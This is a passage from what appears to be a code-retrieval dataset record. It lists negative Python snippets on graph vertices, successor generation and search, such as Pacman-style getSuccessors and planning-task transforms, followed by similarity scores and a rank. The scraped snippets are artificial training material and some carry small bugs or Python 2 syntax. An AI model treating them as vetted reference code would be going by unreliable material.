name in operator_names:\n pre_child = copy.deepcopy(sas_task)\n with timers.timing(\"Obtaining successor\"):\n child = self.transform(pre_child, name)\n yield child, name", "def parse_vertex(lines):\n print \" * Parsing vertex\"\n return _parse_vn(lines, \"v %.6f %.6f %.6f\")", "def neighbor_in_iterator(self, vertex):\n return iter(set(self._backend.iterator_in_nbrs(vertex)))", "def ordenar_vertices(grafo, distancia):\n return list(sorted(distancia.items(),key = lambda x:x[1] , reverse = True ))", "def get_vertices(self):\n return self.graph.keys()", "def get_vertices(self):\n if self.vert_list.keys() != None:\n return self.vert_list.keys()\n raise KeyError(\"Vertex not found\")", "def vertices(self):\n return list(self.graph_dict.keys())", "def vertices(tri, vertex_list):\n dim = len(vertex_list[0])\n p = numpy.zeros((3, dim))\n for j in range(3):\n p[j] = vertex_list[tri[j]]\n return p", "def _anchored_successors(self, n):\n\n # loop on all outgoing edges\n for t in self.successors(n):\n \n # if neighbor is anchored\n # stop looking for (necessarily later) successors\n if t.anchored:\n yield t\n continue\n\n # if neighbor is not anchored\n # look one level deeper\n for tt in self._anchored_successors(t):\n yield tt", "def get_vertex_keys(self):\n return self.vertList.keys()", "def get_successors(self, sas_task):\n raise NotImplementedError(\"This method should be implemented.\")", "def neighbors_in(self, vertex):\n return list(self.neighbor_in_iterator(vertex))", "def getSuccessors(self, currentPosition):\n successors = []\n walls = self.walls\n for action in [Directions.NORTH, Directions.SOUTH, Directions.EAST, Directions.WEST]:\n x, y = currentPosition\n dx, dy = Actions.directionToVector(action)\n nextx, nexty = int(x + dx), int(y + dy)\n if (nextx, nexty) not in walls:\n nextPosition = (nextx, nexty)\n successors.append((action, nextPosition))\n return successors", "def vertices(self):\n try:\n return self._vertices\n except:\n self._vertices = [list(x) for x in self.vertex_generator()]\n return self._vertices", "def pairs_of_vertices(self):\n pairs_of_vertices = []\n for vertice in self.list_of_vertices:\n for edge in vertice.edges_list:\n if non_oriented:\n if (vertice, edge.linked[1]) and (edge.linked[1], vertice) not in pairs_of_vertices:\n pairs_of_vertices.append((vertice, edge.linked[1]))\n if not non_oriented:\n if (vertice, edge.linked[1]) not in pairs_of_vertices:\n pairs_of_vertices.append((vertice, edge.linked[1]))\n return pairs_of_vertices", "def vertices(self):\r\n return list(self.__graph_dict.keys())", "def allsuccessors(obsstore, nodes, ignoreflags=0):\n remaining = set(nodes)\n seen = set(remaining)\n while remaining:\n current = remaining.pop()\n yield current\n for mark in obsstore.successors.get(current, ()):\n # ignore marker flagged with with specified flag\n if mark[2] & ignoreflags:\n continue\n for suc in mark[1]:\n if suc not in seen:\n seen.add(suc)\n remaining.add(suc)", "def get_predecessors(self, node): \n preds = []\n child_state = self.node_to_state(node)\n for it in self.predecessors:\n parent_node = (node[0] + it[0], node[1] + it[1])\n parent_state = self.node_to_state(parent_node)\n edge = self.interpolate(child_state, parent_state, self.distance_bw_states(child_state, parent_state)/self.path_resolution)\n preds.append([parent_node, edge])\n return preds", "def trees(vertices):\n from sage.graphs.trees import TreeIterator\n return iter(TreeIterator(vertices))", "def vertices(self) -> list[Point]:\n first_polygon_index = self.rank - max(self.pdim - 
1, 1) - 1\n new_shape = self.shape[:first_polygon_index] + (-1, self.shape[-1])\n array = self.array.reshape(new_shape)\n return list(distinct(Point(x, copy=False) for x in np.moveaxis(array, -2, 0)))", "def MeshVtxAdjacentVtxs (strMesh, index, blnAbsolutConnections=False, blnCreate=False):\n \"\"\"custom function\"\"\"\n #-----------------------------------------------------------------------------------------------------------------------------------------\n def CullDuplicates(seq, idfun=None): \n # order preserving \n if idfun is None: \n def idfun(x): return x \n seen = {} \n result = [] \n for item in seq: \n marker = idfun(item) \n if marker in seen: continue \n seen[marker] = 1 \n result.append(item) \n return result\n #-----------------------------------------------------------------------------------------------------------------------------------------\n MeshVtxAdjacentVtxs = []\n if rs.IsMesh(strMesh)==False : \n print \"strMesh is not an mesh\"\n return None\n if type(index)==type(\"string\"):\n print \"index is not an integer\"\n return None\n if type(index)==type(0.1): index = int(index)\n\n arrVertices = rs.MeshVertices (strMesh)\n arrFaceVertices = rs.MeshFaceVertices(strMesh)\n\n intCount = 0\n arrAdjacentVtxs = []\n for arrFace in arrFaceVertices:\n blnIsAdjacent = False\n for arrVtxIndex in arrFace:\n if arrVtxIndex == index :\n blnIsAdjacent = True\n if blnIsAdjacent :\n if blnAbsolutConnections :\n if arrFace[2]==arrFace[3] :\n for arrVtxIndex in arrFace :\n if arrVtxIndex != index :\n arrAdjacentVtxs.append( arrVtxIndex)\n else :\n if index == arrFace[0] :\n arrAdjacentVtxs.append( arrFace[3] )\n arrAdjacentVtxs.append( arrFace[1] )\n elif index == arrFace[1] :\n arrAdjacentVtxs.append( arrFace[0] )\n arrAdjacentVtxs.append( arrFace[2] )\n elif index == arrFace[2] :\n arrAdjacentVtxs.append( arrFace[1] )\n arrAdjacentVtxs.append( arrFace[3] )\n elif index == arrFace(3) :\n arrAdjacentVtxs.append( arrFace[2] )\n arrAdjacentVtxs.append( arrFace[0] )\n else :\n for arrVtxIndex in arrFace :\n if arrVtxIndex != index :\n arrAdjacentVtxs.append( arrVtxIndex )\n if type(arrAdjacentVtxs) != type([]) : return None\n arrOrderAdjacentVtxs = CullDuplicates(arrAdjacentVtxs)\n if blnCreate :\n arrStrPts = []\n for arrVtxIndex in arrOrderAdjacentVtxs:\n rs.AddPoint ( arrVertices[arrVtxIndex] )\n arrStrPts.append( arrVertices[arrVtxIndex] )\n return arrStrPts\n else :\n return arrOrderAdjacentVtxs", "def getVertices(self):\n return self.vertexIndex", "def vertices(self):\n s = set([x for x in self.edges.keys()])\n t = set([y for v in self.edges.values() for (y,d) in v.items()])\n v = s.union(t)\n return list(v)", "def shortest_path_search(start, successors, is_goal):\n if is_goal(start): return [start]\n explored = set()\n frontier = [[start]]\n while frontier:\n path = frontier.pop(0)\n s = path[-1]\n for (state,action) in successors(s).items():\n if state not in explored:\n explored.add(state)\n npath = path + [action,state]\n if is_goal(state): return npath\n else: frontier.append(npath)\n return []", "def vertices(self):\n return list(self.__graph.values())", "def getVertexNumbers(self):\n return self.vertexIndex.keys()", "def neighbor_out_iterator(self, vertex):\n return iter(set(self._backend.iterator_out_nbrs(vertex)))", "def get_successors(self, sas_task) -> Generator:\n variables = [var for var in range(len(sas_task.variables.axiom_layers))]\n random.Random(SEED).shuffle(variables)\n for var in variables:\n pre_child = copy.deepcopy(sas_task)\n with timers.timing(\"Obtaining 
successor\"):\n child = self.transform(pre_child, var)\n yield child, var", "def adjacence(self) -> List[List[Poids]]:\n resultat = list()\n for depart in self.sommets:\n ligne = list()\n for arrivee in self.sommets:\n if arrivee in self._voisinage[depart]:\n ligne.append(self._voisinage[depart][arrivee])\n else:\n ligne.append(0)\n resultat.append(ligne)\n return resultat", "def neighbors_out(self, vertex):\n return list(self.neighbor_out_iterator(vertex))", "def task1(graph, n):\r\n alreadyProcessed = set()\r\n B = [j for j in range(1,n+1)]\r\n position = {B[i]:i for i in range(len(B))}\r\n leftNeighbors = {}\r\n parent = {}\r\n \r\n for v in B:\r\n # nodes processed before the current that have an edge in common are left neighbors\r\n leftNeighbors[v] = set(graph._graph[v]) & alreadyProcessed\r\n alreadyProcessed.add(v)\r\n if leftNeighbors[v]:\r\n # the parent is the closest left neighbor \r\n parent[v] = B[max([position[w] for w in leftNeighbors[v]])]\r\n # if this node's neighbors (other then the parent itself) are not a subset of the parent's neighbors \r\n # it means that it's not a lexOrder\r\n if not leftNeighbors[v] - {parent[v]} <= leftNeighbors[parent[v]]:\r\n return []\r\n return B", "def list_vertices(self):\n return list(self.graph_dict.keys())", "def vertices(self):\n return list(self._graph)", "def vertices(self):\n return list(self.__graph_dict.keys())", "def vertices(self):\n return list(self.__graph_dict.keys())", "def vertices(self):\n return list(self.__graph_dict.keys())", "def iterator(self):\n return _osgAnimation.VertexList_iterator(self)", "def candidates(vertex, index, image, binary_sm, unary_sm, counts, empty):\n for k in image:\n if k == index:\n continue\n if counts[index] > 1 or counts[k] > 1:\n yield k\n elif vertex < unary_sm[k]: # implicitly: counts[index]==1 and counts[k]==1\n yield k\n if counts[index] > 2 or (counts[index] == 2 and vertex==binary_sm[index]):\n yield empty", "def getSuccessors(self, state):\n\n successors = []\n for action in [Directions.NORTH, Directions.SOUTH, Directions.EAST, Directions.WEST]:\n x,y = state\n dx, dy = Actions.directionToVector(action)\n nextx, nexty = int(x + dx), int(y + dy)\n if not self.walls[nextx][nexty]:\n nextState = (nextx, nexty)\n cost = self.costFn(nextState)\n successors.append( ( nextState, action, cost) )\n\n # Bookkeeping for display purposes\n self._expanded += 1 # DO NOT CHANGE\n if state not in self._visited:\n self._visited[state] = True\n self._visitedlist.append(state)\n\n return successors", "def getSuccessors(self, state):\n\n successors = []\n for action in [Directions.NORTH, Directions.SOUTH, Directions.EAST, Directions.WEST]:\n x,y = state\n dx, dy = Actions.directionToVector(action)\n nextx, nexty = int(x + dx), int(y + dy)\n if not self.walls[nextx][nexty]:\n nextState = (nextx, nexty)\n cost = self.costFn(nextState)\n successors.append( ( nextState, action, cost) )\n\n # Bookkeeping for display purposes\n self._expanded += 1\n if state not in self._visited:\n self._visited[state] = True\n self._visitedlist.append(state)\n\n return successors", "def getSuccessors(self, state):\n\n successors = []\n for action in [Directions.NORTH, Directions.SOUTH, Directions.EAST, Directions.WEST]:\n x, y = state\n dx, dy = Actions.directionToVector(action)\n nextx, nexty = int(x + dx), int(y + dy)\n if not self.walls[nextx][nexty]:\n nextState = (nextx, nexty)\n cost = self.costFn(nextState)\n successors.append((nextState, action, cost))\n\n # Bookkeeping for display purposes\n self._expanded += 1 # DO 
NOT CHANGE\n if state not in self._visited:\n self._visited[state] = True\n self._visitedlist.append(state)\n\n return successors", "def triples():", "def get_successors(state): \n \n child_states = []\n \n size = len(state)\n i = 0\n j = 0\n for i in range (size):\n if 0 in state[i]:\n for j in range (size):\n if state[i][j] == 0:\n break \n break\n\n if j != size-1:\n child_states.append ((\"Left\", swap_cells(state, i, j, i, j+1)))\n if j != 0:\n child_states.append ((\"Right\", swap_cells(state, i, j, i, j-1)))\n if i != size-1:\n child_states.append ((\"Up\", swap_cells(state, i, j, i+1, j)))\n if i != 0:\n child_states.append ((\"Down\", swap_cells(state, i, j, i-1, j)))\n \n return child_states", "def vertices(self):\n return self._outgoing.keys()", "def get_successors(self, task) -> Generator:\n object_names = [obj.name for obj in task.objects]\n random.Random(SEED).shuffle(object_names)\n for name in object_names:\n pre_child = copy.deepcopy(task)\n with timers.timing(\"Obtaining successor\"):\n child = pre_child.accept(TaskElementEraseObjectVisitor(name))\n yield child, name", "def get_vertices(self, crs=None):\n if crs is None:\n vertices = []\n for poly_vertices in self.vertices:\n vertices.append([np.array(v) for v in poly_vertices])\n return vertices\n else:\n vertices = []\n for poly_vertices in self.vertices:\n poly = []\n for ring_vertices in poly_vertices:\n poly.append(np.array([_reproject(v[:2], self.crs, crs)\n for v in ring_vertices]))\n vertices.append(poly)\n return vertices", "def get_vertices(self):\n return self.vertices", "def get_vertices(self):\n return self.vertices", "def split_at_nodes(shp):\n nodes = find_nodes(shp)\n nodeIds = list(nodes)\n nodeIds.sort()\n nodeIds = dict([(node,i) for i,node in enumerate(nodeIds)])\n \n for road in shp:\n vrts = road.vertices\n midVrts = set(road.vertices[1:-1]) #we know end points are nodes\n midNodes = midVrts.intersection(nodes) # find any nodes in the middle of the feature.\n midIdx = [vrts.index(node) for node in midNodes] # Get their indices\n midIdx.sort()\n if midIdx:\n #print vrts\n starts = [0]+midIdx\n stops = [x+1 for x in midIdx]+[None]\n for start,stop in zip(starts,stops):\n feat = pysal.cg.Chain(vrts[start:stop])\n rec = (nodeIds[feat.vertices[0]],nodeIds[feat.vertices[-1]],False)\n yield feat,rec\n else:\n rec = (nodeIds[road.vertices[0]],nodeIds[road.vertices[-1]],False)\n yield road,rec", "def gen_clustlst(number_of_antecessors, linked_clusters, antecessors):\n clustlst = []\n for j in range(number_of_antecessors):\n lst = []\n for k in range(len(linked_clusters)):\n if linked_clusters[k].antecessor == antecessors[j]:\n lst.append(linked_clusters[k])\n clustlst.append(lst)\n lst = None\n return clustlst" ]
[ "0.7708114", "0.6563205", "0.6376617", "0.6307063", "0.62348616", "0.61934036", "0.60396194", "0.594999", "0.59440297", "0.58112705", "0.57270694", "0.5720067", "0.57045156", "0.5680978", "0.5673067", "0.5660702", "0.56433517", "0.5618526", "0.5613443", "0.5608551", "0.5604928", "0.55698925", "0.55495137", "0.5542951", "0.5542951", "0.5515883", "0.54981035", "0.54907554", "0.5488285", "0.5480832", "0.54760253", "0.54534036", "0.54429144", "0.5438047", "0.5429367", "0.54154366", "0.54104245", "0.539609", "0.53959167", "0.5395785", "0.5395773", "0.5381609", "0.53788954", "0.5372012", "0.53594965", "0.53530556", "0.53493536", "0.5338477", "0.5332277", "0.5328952", "0.5325374", "0.53140396", "0.5298603", "0.52918977", "0.5289509", "0.52841425", "0.5280532", "0.5277066", "0.5276368", "0.52735966", "0.5267273", "0.5264676", "0.52625084", "0.5261416", "0.52550805", "0.5252666", "0.52511317", "0.5239055", "0.5238526", "0.52380264", "0.5237909", "0.52338", "0.52328", "0.52257", "0.52249044", "0.52208686", "0.52042603", "0.5192662", "0.5192201", "0.5187628", "0.5183432", "0.5179905", "0.51666945", "0.51626897", "0.51626897", "0.51626897", "0.51539385", "0.515168", "0.51507324", "0.51441264", "0.5138965", "0.513833", "0.51368207", "0.51332295", "0.5129403", "0.5126816", "0.5123672", "0.5123672", "0.5119859", "0.51171875" ]
0.6470455
2
Find overlapping CDS within an exon given a list of CDS starts
def find_overlapping_cds_simple(v_start, v_stop, cds_begins, strand):
    # cds_start = cds_begin[0]
    if strand == '+':
        return list(filter(lambda x: x[0] >= v_start and x[0] < v_stop, cds_begins))
    else:
        return list(filter(lambda x: x[0] > v_start and x[0] <= v_stop, cds_begins))
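A minimal usage sketch of find_overlapping_cds_simple as defined above. It assumes cds_begins is a list of (start, end) tuples; only the start coordinate x[0] is tested against the interval, and the sample coordinates below are purely illustrative.

    # Hypothetical CDS begin records: (start, end) tuples; only index 0 is used.
    cds_begins = [(100, 250), (300, 450), (500, 650)]

    # '+' strand keeps CDS starts in the half-open interval [v_start, v_stop).
    print(find_overlapping_cds_simple(90, 310, cds_begins, '+'))   # [(100, 250), (300, 450)]

    # '-' strand keeps CDS starts in the half-open interval (v_start, v_stop].
    print(find_overlapping_cds_simple(100, 300, cds_begins, '-'))  # [(300, 450)]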
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def overlap(list1,list2):\n \n coord=[]\n for pos1 in list1:\n #print 'pos in list1 is', pos1\n coord.append(('S',int(pos1.split('-')[0]), 'l1'))\n #print 'S is ', pos1.split('-')[0]\n coord.append(('E',int(pos1.split('-')[1]),'l1'))\n #print 'E is ', pos1.split('-')[1]\n #print coord \n for pos2 in list2:\n #print 'pos in list2 is', pos2\n coord.append(('S',int(pos2.split('-')[0]),'l2'))\n #print 'S is ', pos2.split('-')[0]\n coord.append(('E', int(pos2.split('-')[1]),'l2'))\n #print 'E is ', pos2.split('-')[1]\n #print coord\n \n coord.sort(key = lambda x : x[0], reverse = True)\n #print 'coord after first sort \\n', coord\n coord.sort(key = lambda x : x[1])\n #print 'coord after 2nd sort by number \\n', coord\n # PART 1: SEARCHES FOR OVERLAPS BETWEEN 2 HISTONE MARKS\n new_coord_list = [] #initialize new list to which to move all those that don't overlap\n #index = 0 #position in list \n spos=0 # start pos initialized \n ct=0\n ovl=[]\n for pos in coord:\n new_coord_list.append(pos)\n #print pos, 'doesn\\'t overlap'\n index = int(new_coord_list.index(pos)) \n if pos[0]=='S':\n ct+=1\n if ct==2:\n spos=pos[1]\n if pos[0]=='E':\n ct-=1\n if ct==1:\n if not spos==pos[1]:\n #print spos, '-', pos[1], 'overlap'\n ovl.append(('ovl', spos, pos[1])) # add to overlap vector the positions that overlap\n #print 'overlap found! :', [str(spos),str(pos[1]),'ovl']\n #print 'removing ', new_coord_list[index]\n del new_coord_list[index]\n #print 'removing', new_coord_list[index-1]\n del new_coord_list[index-1]\n \n # \n new_coord_list.sort(key = lambda x : x[0], reverse = True)\n start=0\n end = 0\n two_hist_away_from_cent_of_peak = 0\n two_hist_away_list = []\n for nc_pos in new_coord_list:\n if nc_pos[0]=='S':\n if (start<=two_hist_away_from_cent_of_peak) and (two_hist_away_from_cent_of_peak !=0) and (end!=0): \n #if center_of_peak <= two_hist_away_from_cent_of_peak and (two_hist_away_from_cent_of_peak !=0):\n two_hist_away_list.append('-'.join([str(start),str(end), 'tha']))\n start= nc_pos[1]\n if nc_pos[0]=='E':\n end = nc_pos[1]\n center_of_peak= (start+nc_pos[1])/2\n two_hist_away_from_cent_of_peak = center_of_peak + 300\n # print 'new_coord_list: ', new_coord_list\n return ovl, new_coord_list", "def overlap(component1, component2):\n if component1[0].start <= component2[0].stop and component2[0].start <= component1[0].stop:\n if component1[1].start <= component2[1].stop and component2[1].start <= component1[1].stop:\n return True\n return False", "def overlaps(*objs):\n return set.intersection(*(set(range(*extent(obj))) for obj in objs))", "def get_inter_cds_regions(annotations):\n # Determine locations of inter-CDS regions for each chromosome\n inter_cds_regions = {}\n\n for chr_id, chromosome in annotations.items():\n # get chromosome dimensions (the first feature represents the\n # chromosome itself)\n ch_end = int(chromosome.features[0].location.end)\n\n # filter out everything except for genes\n genes = [x for x in chromosome.features if x.type == 'gene']\n\n # order by position along chromosome\n genes.sort(key=lambda x: x.location.start)\n\n # add range before first gene\n start = 0\n\n # keep track of strand of polycistronic transcriptional unit\n strand = None\n\n inter_cds_regions[chr_id] = {\n -1: [],\n +1: []\n }\n\n # iterate through genes and store the ranges between them;\n # for TriTrypDB files, the gene boundaries are generally the same\n # as the CDS boundaries.\n for gene in genes:\n # Determine location for the region up to start of the gene\n end = 
int(gene.location.start)\n\n # Skip over snoRNAs, etc. that are nested inside of other genes\n # For example: TcCLB TcChr22-2 179,000:180,000\n if end <= start:\n continue\n\n # Add CDS to relevant list based on strand\n if strand is None:\n # Left-most gene\n inter_cds_regions[chr_id][gene.location.strand].append((start, end))\n elif strand != gene.location.strand:\n # Add ORFs in both directions at transcription switch sites (TSSs)\n inter_cds_regions[chr_id][+1].append((start, end))\n inter_cds_regions[chr_id][-1].append((start, end))\n else:\n # Within PTU; look for ORFs on same strand\n inter_cds_regions[chr_id][strand].append((start, end))\n\n # update start counter and strand\n start = int(gene.location.end)\n strand = gene.location.strand\n\n # add region after last gene\n inter_cds_regions[chr_id][strand].append((start, ch_end))\n\n return inter_cds_regions", "def findOverlap( columns, t, minOverlap ):\n for c in columns:\n c.setOverlap() # defaults to 0.0\n for s in c.getConnectedSynapses():\n c.setOverlap( c.getOverlap() + s.getSourcetInput( t ) )\n\n if c.getOverlap() < minOverlap:\n c.setOverlap()\n else:\n c.boostOverlap()", "def calc_overlap(self, start, stop):\n\n overlaps = []\n for s in self.map:\n e = self.map[s]\n if s >= start or s <= stop:\n # We found an overlap\n if e <= stop:\n overlaps.append({\"start\": s, \"stop\": e})\n else:\n overlaps.append({\"start\": s, \"stop\": stop})\n elif e >= start or e <= stop:\n if s >= start:\n overlaps.append({\"start\": s, \"stop\": e})\n else:\n overlaps.append({\"start\": start, \"stop\": e})\n return overlaps", "def _overlap(c1, c2, index='dice'):\n set1 = set(c1)\n set2 = set(c2)\n intersection_num = float(len(set1 & set2))\n try:\n if index == 'dice':\n total_num = len(set1 | set2) + intersection_num\n overlap = 2.0 * intersection_num / total_num\n elif index == 'percent':\n overlap = 1.0 * intersection_num / len(set1)\n else:\n raise Exception(\"Only support 'dice' and 'percent' as overlap indices at present.\")\n except ZeroDivisionError as e:\n print(e)\n overlap = np.nan\n return overlap", "def overlap(start_idx1, end_idx1, start_idx2, end_idx2):\n head = min(end_idx1, end_idx2)\n tail = max(start_idx1, start_idx2)\n return head >= tail", "def overlapping_atoms(cifs):\n errors = []\n\n # catch pymatgen warnings for overlapping atoms\n with warnings.catch_warnings():\n warnings.simplefilter('ignore')\n for cif in cifs:\n try:\n s = CifParser(cif).get_structures(primitive=True)[0]\n assert s.is_ordered\n except (ValueError,AssertionError) as exc:\n s = CifParser(cif, occupancy_tolerance=1000).get_structures(primitive=True)[0]\n s.to(filename=cif)\n print(f'Fixed overlapping atoms in {cif}')\n except Exception as exc:\n errors.append(f'Unable to parse file {cif}')\n \n if errors:\n print('\\n'.join(errors))\n sys.exit(1)", "def find_overlap_range_list(points_list):\n highest_start_point = points_list[0][0]\n lowest_end_point = points_list[0][0] + points_list[0][1]\n\n for point in points_list[1:]:\n highest_start_point = max(highest_start_point, point[0])\n lowest_end_point = min(lowest_end_point, point[1]+point[0])\n\n if lowest_end_point <= highest_start_point:\n return None\n\n return [highest_start_point, lowest_end_point - highest_start_point]", "def exon_context(exon, start, stop):\n assert start and stop\n exon = exon.split('\\t')\n start = start.split('\\t')\n stop = stop.split('\\t')\n assert len(exon) == 9 and len(start) == 9 and len(stop) == 9\n\n hasstart = feat_overlap(exon, start)\n hasstop = 
feat_overlap(exon, stop)\n if hasstart or hasstop:\n if hasstart and hasstop:\n return 'complete'\n elif hasstart:\n return 'start'\n else:\n assert hasstop\n return 'stop'\n\n exonstart = int(exon[3])\n exonend = int(exon[4])\n codonnucs = [start[3], start[4], stop[3], stop[4]]\n codonnucs = [int(x) for x in codonnucs]\n leftmostnuc = min(codonnucs)\n rightmostnuc = max(codonnucs)\n if exonend < leftmostnuc:\n if exon[6] == '-':\n return '3putr'\n else:\n return '5putr'\n elif exonstart > rightmostnuc:\n if exon[6] == '-':\n return '5putr'\n else:\n return '3putr'\n else:\n assert exonstart > leftmostnuc and exonend < rightmostnuc\n return 'cds'", "def dates_intervals_are_overlapped(start_1, end_1, start_2, end_2):\n return end_1 >= start_2 and end_2 >= start_1", "def report_exon_overlap(strand1, exons1, strand2, exons2):\n #print(strand1)\n #print(exons1)\n #print(exons2)\n exons1 = convert_2dlst_to_set(exons1)\n first_exon1, last_exon1 = return_first_and_last_exon(exons1)\n exons2 = convert_2dlst_to_set(exons2)\n first_exon2, last_exon2 = return_first_and_last_exon(exons2)\n \n dct_report = dict()\n if not first_exon1 == first_exon2:\n \"\"\" first exon of isoseq and annotated-gene-model are not exactly the same \"\"\"\n if str(first_exon1).split(\".\")[1] == str(first_exon2).split(\".\")[1]:\n \"\"\" if first intron-start boundary is the same \"\"\"\n if int(str(first_exon1).split(\".\")[0]) > int(str(first_exon2).split(\".\")[0]):\n \"\"\" if isoseq first exon is shorter \"\"\"\n if strand1 == \"+\":\n dct_report[5] = \"partial_inside\"\n else:\n dct_report[3] = \"partial_inside\"\n else:\n \"\"\" if isoseq first exon is longer \"\"\"\n if strand1 == \"+\":\n dct_report[5] = \"partial_outside\"\n else:\n dct_report[3] = \"partial_outside\"\n else:\n if strand1 == \"+\":\n dct_report[5] = \"different\"\n else:\n dct_report[3] = \"different\"\n else:\n if strand1 == \"+\":\n dct_report[5] = \"same\"\n else:\n dct_report[3] = \"same\"\n\n if not last_exon1 == last_exon2:\n \"\"\" last exon of isoseq and annotated-gene-model are not exactly the same \"\"\"\n if str(last_exon1).split(\".\")[0] == str(last_exon2).split(\".\")[0]:\n \"\"\" if last intron-end boundary is the same \"\"\"\n if int(str(last_exon1).split(\".\")[1]) < int(str(last_exon2).split(\".\")[1]):\n \"\"\" if isoseq first exon is shorter \"\"\"\n if strand1 == \"+\":\n dct_report[3] = \"partial_inside\"\n else:\n dct_report[5] = \"partial_inside\"\n else:\n \"\"\" if isoseq first exon is longer \"\"\"\n if strand1 == \"+\":\n dct_report[3] = \"partial_outside\"\n else:\n dct_report[5] = \"partial_outside\"\n else:\n if strand1 == \"+\":\n dct_report[3] = \"different\"\n else:\n dct_report[5] = \"different\" \n else:\n if strand1 == \"+\":\n dct_report[3] = \"same\"\n else:\n dct_report[5] = \"same\"\n return(dct_report[5], dct_report[3])", "def calculate_overlaps(drives, dist_tol, time_tol):\n \n for i1 in range(len(drives)-1):\n d1 = drives[i1]\n \n for i2 in range(i1+1, len(drives)):\n d2 = drives[i2]\n \n #stop trying if d1 ends more than time_tol before d2 starts\n #note that drives are chronologically ordered\n if d2.coords[0].time - d1.coords[-1].time > time_tol:\n break\n \n overlap = ol.compute_overlap(d1, d2, dist_tol, time_tol)\n if overlap:\n ol1 = ol.Overlap(d1, d2, overlap[0], overlap[1])\n d1.append_overlap(ol1)\n ol2 = ol.Overlap(d2, d1, overlap[2], overlap[3])\n d2.append_overlap(ol2)", "def find_overlapping_segments(pos, seg, columns):\n seg = seg.sort_values(['start', 'end'])\n\n if 
seg.duplicated(['start', 'end']).any():\n raise ValueError('duplicate columns')\n\n start_idx = np.searchsorted(seg['start'].values, pos['coord'].values) - 1\n end_idx = np.searchsorted(seg['end'].values, pos['coord'].values)\n\n mask = (start_idx == end_idx)\n\n results = pos.copy()\n\n for col in columns:\n results[col] = np.nan\n results.loc[mask, col] = seg[col].iloc[end_idx[mask]].values\n\n return results", "def overlapping_atoms(cifs):\n messages = []\n\n for cif in cifs:\n try:\n atoms = io.read(cif)\n except Exception as exc:\n raise ValueError(f'Unable to parse file {cif}') from exc\n overlaps = geometry.get_duplicate_atoms(atoms, cutoff=0.1)\n if len(overlaps) != 0:\n messages.append(f'Overlapping atoms detected in {cif}')\n \n if messages:\n print(messages)\n sys.exit(1)\n\n print('No overlapping atoms found.')", "def arglocs_overlap(*args):\n return _ida_hexrays.arglocs_overlap(*args)", "def exon_finder(tstart,tend,strand,qstart,qend,qlen,qstartphase,qendphase,seqdict,seqname,\n max_offset = 30, is_start = False, is_stop = False, nevermind_atg = False,\n cluster = None,exon_number = None,log_file = open(os.devnull, 'w'),full_pseudoexon_search = True,\n exon_info_dict = False):\n start = None\n end = None\n pseudo = False\n max_coord = len(seqdict[seqname]) - 1\n if strand == \"+\":\n phasestart_offset = (3 - qstartphase) % 3\n phasestop_offset = qendphase\n start_match_offset, stop_match_offset = 3 * (qstart - 1),3 * (qlen - qend)\n elif strand == '-':\n phasestart_offset = qendphase\n phasestop_offset = (3 - qstartphase) % 3\n start_match_offset, stop_match_offset = 3 * (qlen - qend), 3 * qstart\n ideal_start = tstart - phasestart_offset - start_match_offset\n ideal_end = tend + stop_match_offset + phasestop_offset\n pseudo_start = tstart - phasestart_offset\n pseudo_end = tend + phasestop_offset\n gc_start, gc_end = None, None\n for offset in range(0,max_offset + 3,3):\n if start:\n break\n for direction in [1,-1]:\n test_start = ideal_start - offset * direction\n test_seq = genome.Sequence(seqdict[seqname][test_start-1 + phasestart_offset:tend])\n if strand == \"-\":\n test_seq = test_seq.reverse_compliment()\n if not test_seq.translate():\n continue\n elif is_stop and strand == \"-\":\n if ideal_start - 1 < test_start < pseudo_start:\n pseudo_start = test_start\n lastcodon = seqdict[seqname][test_start - 1:test_start + 2]\n if lastcodon.upper() in ['TTA','TCA','CTA'] and test_seq.translate().count('*') == 1:\n start = test_start\n break\n elif not \"*\" in test_seq.translate():\n if ideal_start - 1 < test_start < pseudo_start:\n pseudo_start = test_start\n if is_start and strand == '+':\n if nevermind_atg:\n start = test_start\n break\n else:\n firstcodon = seqdict[seqname][test_start - 1:test_start + 2]\n if firstcodon.upper() == \"ATG\":\n start = test_start\n break\n else:\n splicesite = seqdict[seqname][test_start-3:test_start-1]\n if (strand == '+' and splicesite.upper() == \"AG\") or (strand == '-' and splicesite.upper() == \"AC\"):\n start = test_start\n break\n elif strand == '-' and splicesite.upper() == \"GC\" and not gc_start:\n gc_start = test_start\n if not start:\n if gc_start:\n start = gc_start\n else:\n pseudo = \"P\"\n start = pseudo_start\n for offset in range(0,max_offset + 3,3):\n if end:\n break\n for direction in [-1,1]:\n test_end = ideal_end - offset * direction\n if test_end - start < 3:\n break\n test_seq = genome.Sequence(seqdict[seqname][start - 1 + phasestart_offset:test_end - phasestop_offset])\n if strand == \"-\":\n test_seq = 
test_seq.reverse_compliment()\n if not test_seq.translate():\n continue\n elif is_stop and strand == \"+\":\n if ideal_end + 1 > test_end > pseudo_end:\n pseudo_end = test_end\n lastcodon = seqdict[seqname][test_end - 3:test_end]\n if lastcodon.upper() in ['TAA','TGA','TAG'] and test_seq.translate().count('*') == 1:\n end = test_end\n break\n elif not \"*\" in test_seq.translate() or (is_stop and not \"*\" in test_seq.translate()[:-1]):\n if ideal_end + 1 > test_end > pseudo_end:\n pseudo_end = test_end\n if is_start and strand == '-':\n if nevermind_atg:\n end = test_end\n break\n else:\n firstcodon = seqdict[seqname][test_end - 3:test_end]\n if firstcodon.upper() == \"CAT\":\n end = test_end\n break\n else:\n splicesite = seqdict[seqname][test_end:test_end + 2]\n if (strand == '+' and splicesite.upper() == \"GT\") or (strand == '-' and splicesite.upper() == \"CT\"):\n end = test_end\n break\n elif strand == \"+\" and splicesite.upper() == \"GC\" and not gc_end:\n gc_end = test_end\n if not end:\n if gc_end:\n end = gc_end\n else:\n pseudo = \"P\"\n end = pseudo_end\n start = max([1,start])\n end = min([end,max_coord])\n if pseudo and full_pseudoexon_search and cluster != None and exon_number != None and exon_info_dict:\n gwexons = genewisesearch(seqdict[seqname],qstartphase,qendphase,strand,\n exon_info_dict[str(cluster) + ':' + str(exon_number)][6], \n search_coords = [ideal_start - 3 - max_offset,ideal_end + 3 + max_offset],\n seqname = seqname,log_file=log_file)\n if gwexons != []:\n return gwexons\n return [[start,end,pseudo]]", "def overlapping(x,y):\n for i in range(0,len(x)):\n for j in range(0,len(y)):\n if x[i] == y[j]:\n return True\n else:\n continue#reapet until finished all number in the list\n return False", "def contiguousInds(args):\n condition = (np.array(args) > 0.0)\n\n # Find the indicies of changes in ``condition``\n dd = np.diff(condition)\n idx, = dd.nonzero()\n\n # Start things after change in ``condition``, thus 